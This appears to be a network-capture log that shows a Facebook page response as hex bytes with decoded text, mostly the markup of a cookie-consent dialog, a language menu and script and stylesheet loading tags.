                                                                                    2023-02-07 18:46:27 UTC1484INData Raw: 31 32 38 39 0d 0a 37 30 36 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 7a 68 5f 43 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 73 5f 69 76 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 34 65 32 64 5c 75 36 35 38 37 28 5c 75 37 62 38 30 5c 75 34 66 35 33 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65
                                                                                    Data Ascii: 12897063)","title":"","className":"headerItem"},{"class":"headerItem","value":"zh_CN","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_s_iv"},"label":"\u4e2d\u6587(\u7b80\u4f53)","title":"","className":"headerIte
                                                                                    2023-02-07 18:46:27 UTC1485INData Raw: 65 4f 6e 48 69 64 65 22 7d 5d 2c 22 61 74 74 72 69 62 75 74 65 73 22 3a 7b 22 64 61 74 61 2d 74 65 73 74 69 64 22 3a 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 22 7d 2c 22 63 6c 61 73 73 4e 61 6d 65 73 22 3a 5b 22 5f 39 6f 2d 77 22 5d 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 39 32 22 7d 5d 2c 32 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 35 61 64 32 34 33 64 5f 30 5f 30 5f 57 50 22 2c 5b 22 50 6f 70 6f 76 65 72 4d 65 6e 75 22 2c 22 5f 5f 69 6e 73 74 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 68 6d 22 2c 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 2b 63 22 2c 22 5f 5f 69 6e 73 74 5f 30 32 31 38 32 30 31 35 5f 30 5f 30 5f 6c 42 22 2c 22 50 6f 70 6f 76
                                                                                    Data Ascii: eOnHide"}],"attributes":{"data-testid":"cookie-policy-manage-dialog"},"classNames":["_9o-w"]},{"__m":"__markup_9f5fac15_0_0_92"}],2],["__inst_e5ad243d_0_0_WP",["PopoverMenu","__inst_1de146dc_0_0_hm","__elem_ec77afbd_0_0_+c","__inst_02182015_0_0_lB","Popov
                                                                                    2023-02-07 18:46:27 UTC1486INData Raw: 73 5f 74 69 74 6c 65 5c 22 3e 41 6c 6c 6f 77 20 74 68 65 20 75 73 65 20 6f 66 20 63 6f 6f 6b 69 65 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 6f 6e 20 74 68 69 73 20 62 72 6f 77 73 65 72 3f 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 67 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 31 5c 22 3e 57 65 20 75 73 65 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 73 69 6d 69 6c 61 72 20 74 65 63 68 6e 6f 6c 6f 67 69 65 73 20 74 6f 20 68 65 6c 70 3a 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f
                                                                                    Data Ascii: s_title\">Allow the use of cookies from Facebook on this browser?\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9o-g\">\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xo1\">We use cookies and similar technologies to help:\u003C\/div>\u003Cdiv class=\"_9xo
                                                                                    2023-02-07 18:46:27 UTC1488INData Raw: 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 76 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 70 77 5c 22 3e 45 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 54 68 65 73 65 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 72 65 71 75 69 72 65 64 20 74 6f 20 75 73 65 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2e 20 54 68 65 79 5c 75 32 30 31 39 72 65 20 6e 65 63 65 73 73 61 72 79 20 66 6f 72 20 74 68 65 73 65 20 73 69 74 65 73 20 74 6f 20 77 6f 72 6b 20 61 73 20 69 0d 0a 32 66
                                                                                    Data Ascii: C\/a>.\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cdiv>\u003Cdiv class=\"_9xpv\">\u003Cdiv>\u003Cdiv class=\"_9xpw\">Essential cookies\u003C\/div>\u003Cdiv>These cookies are required to use Meta Products. They\u2019re necessary for these sites to work as i2f
                                                                                    2023-02-07 18:46:27 UTC1489INData Raw: 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 57 65 5c 75 32 30 31 39 6c 6c 20 62 65 20 61 62 6c 65 20 74 6f 20 62 65 74 74 65 72 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 66 6f 72 20 79 6f 75 20 6f 66 66 20 6f 66 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 64 20 6d 65 61 73 75 72 65 20 74 68 65 69 72 20 70 65 72 66 6f 72 6d 61 6e 63 65 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 46 65 61 74 75 72 65 73 20 6f 6e 20 6f 75 72 20 70 72 6f 64 75 63 74 73 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 61 66 66 65 63 74 65 64 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 20 63 6c 61 73 73 3d 5c 22 5f 39 78 71 30 5c 22 3e 4f 74 68 65 72 20 63 6f 6d
                                                                                    Data Ascii: \u003Cli class=\"_9xq0\">We\u2019ll be able to better personalize ads for you off of Meta Products, and measure their performance\u003C\/li>\u003Cli class=\"_9xq0\">Features on our products will not be affected\u003C\/li>\u003Cli class=\"_9xq0\">Other com
                                                                                    2023-02-07 18:46:27 UTC1491INData Raw: 74 2c 20 79 6f 75 20 63 61 6e 20 6d 61 6e 61 67 65 20 68 6f 77 20 64 69 66 66 65 72 65 6e 74 20 64 61 74 61 20 69 73 20 75 73 65 64 20 74 6f 20 70 65 72 73 6f 6e 61 6c 69 7a 65 20 61 64 73 20 77 69 74 68 20 74 68 65 73 65 20 74 6f 6f 6c 73 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 54 6f 20 73 68 6f 77 20 79 6f 75 20 62 65 74 74 65 72 20 61 64 73 2c 20 77 65 20 75 73 65 20 64 61 74 61 20 74 68 61 74 20 61 64 76 65 72 74 69 73 65 72 73 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 6e 65 72 73 20 70 72 6f 76 69 64 65 20 75 73 20 61 62 6f 75 74 20 79 6f 75 72 20 61
                                                                                    Data Ascii: t, you can manage how different data is used to personalize ads with these tools.\u003C\/p>\u003Cp class=\"_9si-\">Ad settings\u003C\/p>\u003Cp class=\"_9o-m\">To show you better ads, we use data that advertisers and other partners provide us about your a
                                                                                    2023-02-07 18:46:27 UTC1492INData Raw: 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 68 65 6c 70 5c 2f 32 32 33 30 35 30 33 37 39 37 32 36 35 31 35 36 5c 22 3e 42 75 73 69 6e 65 73 73 20 54 6f 6f 6c 73 5c 75 30 30 33 43 5c 2f 61 3e 2c 20 73 75 63 68 20 61 73 20 46 61 63 65 62 6f 6f 6b 20 4c 6f 67 69 6e 20 6f 72 20 4d 65 74 61 20 50 69 78 65 6c 2c 20 74 6f 20 73 68 61 72 65 20 74 68 69 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 77 69 74 68 20 75 73 2e 20 54 68 69 73 20 68 65 6c 70 73 20 75 73 20 64 6f 20 74 68 69 6e 67 73 20 73 75 63 68 20 61 73 20 67 69 76 65 20 79 6f 75 20 61 20 6d 6f 72 65 20 70 65 72 73 6f 6e 61 6c 69 7a 65 64 20 65 78 70 65 72 69 65 6e 63 65 20 6f 6e 20 4d 65 74 61 20 50 72 6f 64 75 63 74 73 2e 20 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 5c 75 30
                                                                                    Data Ascii: /\/www.facebook.com\/help\/2230503797265156\">Business Tools\u003C\/a>, such as Facebook Login or Meta Pixel, to share this information with us. This helps us do things such as give you a more personalized experience on Meta Products. Learn more about \u0
                                                                                    2023-02-07 18:46:27 UTC1494INData Raw: 35 32 46 26 61 6d 70 3b 68 3d 41 54 31 5a 74 6c 61 62 59 61 47 47 66 6d 55 73 35 4e 32 57 4f 76 58 49 54 67 4e 45 68 42 2d 59 6b 38 7a 49 36 50 70 37 38 71 51 4c 50 41 6e 62 64 33 70 38 54 54 71 41 75 6c 4e 6b 75 63 72 78 30 4a 65 4f 30 66 33 34 4b 6a 6b 65 5a 39 5f 4c 5a 4e 6a 6c 58 37 66 4e 45 43 4f 63 44 76 63 71 67 64 6e 6c 31 54 43 46 6e 4d 39 57 74 53 73 74 6a 2d 52 35 64 34 4d 35 44 62 36 50 30 35 38 63 63 49 7a 50 79 69 42 72 4d 6d 69 61 76 31 6f 65 4d 35 53 30 50 77 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65
                                                                                    Data Ascii: 52F&amp;h=AT1ZtlabYaGGfmUs5N2WOvXITgNEhB-Yk8zI6Pp78qQLPAnbd3p8TTqAulNkucrx0JeO0f34KjkeZ9_LZNjlX7fNECOcDvcqgdnl1TCFnM9WtSstj-R5d4M5Db6P058ccIzPyiBrMmiav1oeM5S0Pw\" target=\"_blank\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance
                                                                                    2023-02-07 18:46:27 UTC1495INData Raw: 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 79 6f 75 72 61 64 63 68 6f 69 63 65 73 2e 63 61 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 33 6a 38 67 69 48 37 44 6b 33 79 6c 2d 51 70 70 63 45 46 6b 34 43 37 2d 62 49 55 78 4d 38 76 72 49 61 73 56
                                                                                    Data Ascii: k\" rel=\"nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fyouradchoices.ca\u00252F&amp;h=AT3j8giH7Dk3yl-QppcEFk4C7-bIUxM8vrIasV
                                                                                    2023-02-07 18:46:27 UTC1497INData Raw: 6f 77 73 65 72 20 63 6f 6f 6b 69 65 73 20 61 72 65 20 73 65 74 20 61 6e 64 20 74 6f 20 64 65 6c 65 74 65 20 74 68 65 6d 2e 20 54 68 65 73 65 20 63 6f 6e 74 72 6f 6c 73 20 76 61 72 79 20 62 79 20 62 72 6f 77 73 65 72 2c 20 61 6e 64 20 6d 61 6e 75 66 61 63 74 75 72 65 72 73 20 6d 61 79 20 63 68 61 6e 67 65 20 62 6f 74 68 20 74 68 65 20 73 65 74 74 69 6e 67 73 20 74 68 65 79 20 6d 61 6b 65 20 61 76 61 69 6c 61 62 6c 65 20 61 6e 64 20 68 6f 77 20 74 68 65 79 20 77 6f 72 6b 20 61 74 20 61 6e 79 20 74 69 6d 65 2e 20 41 73 20 6f 66 20 35 20 4f 63 74 6f 62 65 72 20 32 30 32 30 2c 20 79 6f 75 20 6d 61 79 20 66 69 6e 64 20 61 64 64 69 74 69 6f 6e 61 6c 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 65 20 63 6f 6e 74 72 6f 6c 73 20 6f 66 66 65 72 65
                                                                                    Data Ascii: owser cookies are set and to delete them. These controls vary by browser, and manufacturers may change both the settings they make available and how they work at any time. As of 5 October 2020, you may find additional information about the controls offere
                                                                                    2023-02-07 18:46:27 UTC1498INData Raw: 30 32 35 32 46 6b 62 5c 75 30 30 32 35 32 46 65 6e 61 62 6c 65 2d 61 6e 64 2d 64 69 73 61 62 6c 65 2d 63 6f 6f 6b 69 65 73 2d 77 65 62 73 69 74 65 2d 70 72 65 66 65 72 65 6e 63 65 73 26 61 6d 70 3b 68 3d 41 54 32 5f 32 58 39 70 69 62 4e 73 31 70 51 5f 44 62 65 51 35 39 41 73 75 59 59 5a 53 72 6b 57 73 44 7a 34 46 76 32 57 52 51 44 52 55 58 33 53 41 49 34 63 46 71 74 79 59 6e 63 36 50 57 5a 57 53 6e 6e 57 37 30 34 49 66 6b 33 42 58 58 64 63 75 4d 5f 66 53 58 32 53 55 64 68 4a 41 44 4d 57 4e 79 58 6e 45 33 32 52 4b 33 4f 66 63 59 4d 4b 6e 30 6e 6e 50 63 5f 6f 72 35 47 4d 30 6c 5f 42 62 4d 49 41 49 59 69 75 73 73 4b 47 79 76 75 36 6b 64 61 47 77 41 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 66 6f 6c 6c 6f 77 5c 22
                                                                                    Data Ascii: 0252Fkb\u00252Fenable-and-disable-cookies-website-preferences&amp;h=AT2_2X9pibNs1pQ_DbeQ59AsuYYZSrkWsDz4Fv2WRQDRUX3SAI4cFqtyYnc6PWZWSnnW704Ifk3BXXdcuM_fSX2SUdhJADMWNyXnE32RK3OfcYMKn0nnPc_or5GM0l_BbMIAIYiussKGyvu6kdaGwA\" target=\"_blank\" rel=\"nofollow\"
                                                                                    2023-02-07 18:46:27 UTC1500INData Raw: 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 4f 70 65 72 61 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 5c 2f 75 6c 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 35 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 78 6f 36 20 5f 34 6a 79 33 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31
                                                                                    Data Ascii: w\" data-lynx-mode=\"asynclazy\">Opera\u003C\/a>\u003C\/li>\u003C\/ul>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo5\">\u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9xo6 _4jy3 _4jy1 selected _51
                                                                                    2023-02-07 18:46:27 UTC1500INData Raw: 32 37 36 65 0d 0a 3d 5c 22 63 6f 6f 6b 69 65 2d 70 6f 6c 69 63 79 2d 6d 61 6e 61 67 65 2d 64 69 61 6c 6f 67 2d 61 63 63 65 70 74 2d 62 75 74 74 6f 6e 5c 22 20 74 69 74 6c 65 3d 5c 22 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 22 20 74 79 70 65 3d 5c 22 73 75 62 6d 69 74 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 63 5f 75 4e 5c 22 3e 4f 6e 6c 79 20 61 6c 6c 6f 77 20 65 73 73 65 6e 74 69 61 6c 20 63 6f 6f 6b 69 65 73 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 5c 22 31 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 39 78 6f 37 20 5f 34 6a 79 33 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 5c 22 20 64 61 74 61 2d 63 6f 6f
                                                                                    Data Ascii: 276e=\"cookie-policy-manage-dialog-accept-button\" title=\"Only allow essential cookies\" type=\"submit\" id=\"u_0_c_uN\">Only allow essential cookies\u003C\/button>\u003Cbutton value=\"1\" class=\"_42ft _4jy0 _9xo7 _4jy3 _4jy1 selected _51sy\" data-coo
                                                                                    2023-02-07 18:46:27 UTC1501INData Raw: 6d 69 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 44 7a 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 53 76 65 6e 73 6b 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 6e 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 69 5c 75 31 65 62 66 6e 67 20 56 69 5c 75 31 65 63 37 74 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 52 68 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 33 36 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72
                                                                                    Data Ascii: mi"},1],["__markup_3310c079_0_h_Dz",{"__html":"Svenska"},1],["__markup_3310c079_0_i_nh",{"__html":"Ti\u1ebfng Vi\u1ec7t"},1],["__markup_3310c079_0_j_Rh",{"__html":"T\u00fcrk\u00e7e"},1],["__markup_3310c079_0_k_36",{"__html":"\u010ce\u0161tina"},1],["__mar
                                                                                    2023-02-07 18:46:27 UTC1503INData Raw: 65 6c 65 6d 5f 31 64 65 31 34 36 64 63 5f 30 5f 30 5f 6a 73 22 2c 22 75 5f 30 5f 36 5f 61 64 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 39 32 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 65 63 37 37 61 66 62 64 5f 30 5f 30 5f 2b 63 22 2c 22 75 5f 30 5f 37 5f 63 68 22 2c 33 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 39 32 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 33 5f 71 68 22 2c 22 75 5f 30 5f 38 5f 4d 45 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 39 32 22 5d 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 34 5f 61 2b 22 2c 22 75 5f 30 5f 39 5f 7a 79 22 2c 31 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f
                                                                                    Data Ascii: elem_1de146dc_0_0_js","u_0_6_ad",1,"__markup_9f5fac15_0_0_92"],["__elem_ec77afbd_0_0_+c","u_0_7_ch",3,"__markup_9f5fac15_0_0_92"],["__elem_a588f507_0_3_qh","u_0_8_ME",1,"__markup_9f5fac15_0_0_92"],["__elem_a588f507_0_4_a+","u_0_9_zy",1,"__markup_9f5fac15_
                                                                                    2023-02-07 18:46:27 UTC1504INData Raw: 67 6c 65 4c 65 76 65 6c 4d 61 6e 61 67 65 44 69 61 6c 6f 67 43 6f 6e 74 72 6f 6c 6c 65 72 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 6b 4e 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 41 73 22 2c 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 33 75 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 6b 4e 22 7d 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 30 5f 41 73 22 7d 2c 22 46 61 63 65 62 6f 6f 6b 22 2c 66 61 6c 73 65 2c 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 34 35 64 37 33 62 35 64 5f 30 5f 31 5f 33 75 22 7d 5d 5d 2c 5b 22 41 73 79 6e 63 52 65 71 75 65 73 74 4e 65 63 74 61 72
                                                                                    Data Ascii: gleLevelManageDialogController","init",["__inst_ead1e565_0_0_kN","__elem_45d73b5d_0_0_As","__elem_45d73b5d_0_1_3u"],[{"__m":"__inst_ead1e565_0_0_kN"},{"__m":"__elem_45d73b5d_0_0_As"},"Facebook",false,{"__m":"__elem_45d73b5d_0_1_3u"}]],["AsyncRequestNectar
                                                                                    2023-02-07 18:46:27 UTC1506INData Raw: 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 43 6f 6f 6b 69 65 41 63 63 6f 72 64 69 6f 6e 22 2c 22 69 6e 69 74 22 2c 5b 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 42 63 22 5d 2c 5b 7b 22 5f 5f 6d 22 3a 22 5f 5f 65 6c 65 6d 5f 61 35 38 38 66 35 30 37 5f 30 5f 36 5f 42 63 22 7d 2c 22 5f 39 6e 67 62 22 2c 22 2e 5f 39 6e 67 61 22 2c 22 2e 5f 39 6e 67 64 22 2c 22 2e 5f 39 6e 67 67 22 5d 5d 2c 5b 22 41 6e 69 6d 61 74 69 6f 6e 22 5d 2c 5b 22 52 65 71 75 69 72 65 44 65 66 65 72 72 65 64 52 65 66 65 72 65 6e 63 65 22 2c 22 75 6e 62 6c 6f 63 6b 22 2c 5b 5d 2c 5b 5b 22 46 62 74 4c 6f 67 67 69 6e 67 22 2c 22 49 6e 74 6c 51 74 45 76 65 6e 74 46 61 6c 63 6f 45 76 65 6e 74 22 2c 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 2c 22
                                                                                    Data Ascii: "._9ngg"]],["CookieAccordion","init",["__elem_a588f507_0_6_Bc"],[{"__m":"__elem_a588f507_0_6_Bc"},"_9ngb","._9nga","._9ngd","._9ngg"]],["Animation"],["RequireDeferredReference","unblock",[],[["FbtLogging","IntlQtEventFalcoEvent","BanzaiScuba_DEPRECATED","
                                                                                    2023-02-07 18:46:27 UTC1507INData Raw: 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 30 2f 6c 2f 30 2c 63 72 6f 73 73 2f 66 31 46 53 38 69 4a 53 5f 56 78 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 2f 72 73 72 63 2e 70 68 70 2f 76 33 2f 79 39 2f 6c 2f 30 2c 63 72 6f 73 73 2f 2d 2d 38 54 61 6a 43 54 35 6c 72 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 20 61 73 3d 22 73 74 79 6c 65 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a
                                                                                    Data Ascii: /static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/f1FS8iJS_Vx.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/--8TajCT5lr.css?_nc_x=Ij3Wp8lg5Kz" as="style" /><link rel="preload" href="https:
                                                                                    2023-02-07 18:46:27 UTC1509INData Raw: 70 61 67 65 6c 65 74 5f 72 65 70 6c 61 79 61 62 6c 65 5f 61 63 74 69 6f 6e 73 22 3a 66 61 6c 73 65 7d 7d 29 29 3b 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 6e 6f 77 5f 69 6e 6c 28 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62 69 67 50 69 70 65 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 62 69 67 50 69 70 65 29 7b 62 69 67 50 69 70 65 2e 62 65 66 6f 72 65 50 61 67 65 6c 65 74 41 72 72 69 76 65 28 22 66 69 72 73 74 5f 72 65 73 70 6f 6e 73 65 22 2c 6e 29 3b 7d 29 7d 29 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 30 55 6a 45 63 4b 36 64 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 5f 5f 62
                                                                                    Data Ascii: pagelet_replayable_actions":false}}));});</script><script nonce="0UjEcK6d">(function(){var n=now_inl();requireLazy(["__bigPipe"],function(bigPipe){bigPipe.beforePageletArrive("first_response",n);})})();</script><script nonce="0UjEcK6d">requireLazy(["__b
